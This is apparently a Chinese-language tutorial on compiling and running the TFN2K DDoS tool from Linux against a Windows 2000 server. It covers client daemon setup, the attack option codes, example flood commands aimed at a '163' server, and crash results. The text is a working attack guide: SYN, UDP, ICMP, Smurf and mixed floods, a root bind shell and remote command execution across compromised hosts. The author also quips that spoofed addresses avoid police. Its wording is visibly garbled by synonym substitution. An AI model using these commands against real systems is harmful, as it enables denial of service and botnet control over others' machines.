使用LINUX体系DDOS攻击WINDOWS服务器





使用当下最有名的REDHAT LINUX进 行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最著名的DDOS攻击工具 TFN2K LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000SERVER 服务开有APACHE2 FTP VNC关系不大,重要攻击APACHE

0.解压 tar zxvf tfn2k.tgz
1.装置TFN2K
TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应当都会的吧,但有
多少个处所是必需留神的,因为使用不同版本和厂商的LINUX需要不同的设置.
先修正src/ip.h
解释掉以下局部，否则编译犯错。
　　　
/.struct in_addr
　　　
　　 unsigned long int s_addr;
;./
然后make进行编译
编译时会提醒你输入服务器端进行密码设置832位,(攻击的时候需要输入密码)编译后会出
现两个新的履行文件td 跟 tfn,其中td是守护过程,也是客户机的应用进程,而tfn是服务器
节制进程,假如想攻击别人就必须先起动td这个进程,而后再运行服务器进程,否则攻击无效,
更改密码可以执行mkpass进行更改,最后在所有的客户机中安装并运行td(须要ROOT权
限),并且在服务器上建破一个文本文件,文件中记录所有的客户机IP地址(用VI编纂一个就
可行了),格式为:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然后在主服务器上运行./tfn
2.攻击
./tfn直接回车大家能够看到一些参数,英文好的友人估量不必我来多讲了:)
格局./tfn 参数
无用的参数咱们不提,我们来说攻击用的
f 这个参数后面跟方才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS
h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址
p 后面指定一个端口,不用说了
c 最要害的参数,一共有11个选相
0 结束攻击,发善心用的
1 反诈骗等级设定 ,由于TFN这个工具在攻击的时候所发出的数据包是带有源地址的,然而
源地址是随机的,也就是说地址不是你自给的,所以不用担忧警察抓,哈哈
2 改编数据包的包尺寸：缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过
转变每个包的有效载荷的字节增加它的大小。
3　　绑定root　shell:启动一个会话服务，然后你连接一个指定端口就可以得到一个root
shell。
4　　UDP洪水攻击：这个攻击是应用这样一个事实：每个udp包被送往一个封闭的端口，
这样就会有一个ICMP不可达到的信息返回，增长了攻击的才能。
5　　SYN洪水攻击：这个攻击有法则的送虚伪的连接恳求。成果会是目的端口拒绝服务，
添瞒TCP连接表，通过对不存在主机的TCP/RST响应增添攻击潜力,是尺度的谢绝服务攻
击.
6　　ICMP响应(ping)攻击：这个攻击发送虚假地址的ping要求，目标主机遇回送雷同
大小的响应包。
7 SMURF攻击：用目标主机的地址发送ping请求以播送扩展，这样目标主机将得到回
复一个多倍的回复。
8　　MIX攻击：依照1:1:1的关联交替的发送udp,syn,icmp包，这样就可以凑合路由
器，其它包转发装备，NIDS,sniffers等,轮流轰炸:)
9　 TARGA3攻打
10　　远程命令执行,这个参数是TFN的附加功效,实在TFN的攻击不仅仅是DOS,还可以
远程的进行明令把持,如:
./tfn f hostext c 10 i "mkdir /root/edison" 在所有的HOST上root家目录树立
edison,i后面跟"命令"
参数基础说完,下面攻击
./tfn f hostext c 4 i
使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动
td进程)
./tfn f hostext c 5 i p 80
使用hostext文件中记载的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其余
不用说了)
./tfn f hostext c 6 i
使用hostext文件中记载的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出立刻
逝世机)
./tfn f hostext c 8 i
使用hostext文件中记录的主机对163服务器进行ICMP 测试结果:
一对一攻击,攻击方式TCP 连接方式本地 本地CPU13 被攻击的服务器CPU使用率70
以上,并时时稳定
二对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13 被攻击的服务器CPU使用率
100
五对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13 被攻击的服务器死机
自己家里只有6台机器,但如果再多点,几十台机器,个别的个人服务器确定要死掉了
一对一攻击,攻击方式ICMP 连接方式本地 本地CPU18 被攻击的服务器CPU使用率
96以上,并时时波动
二对一攻击,攻击方式ICMP 衔接方法本地 本地单机CPU18 被袭击的服务器以经无奈上
网,简直无法使用,半小时内死机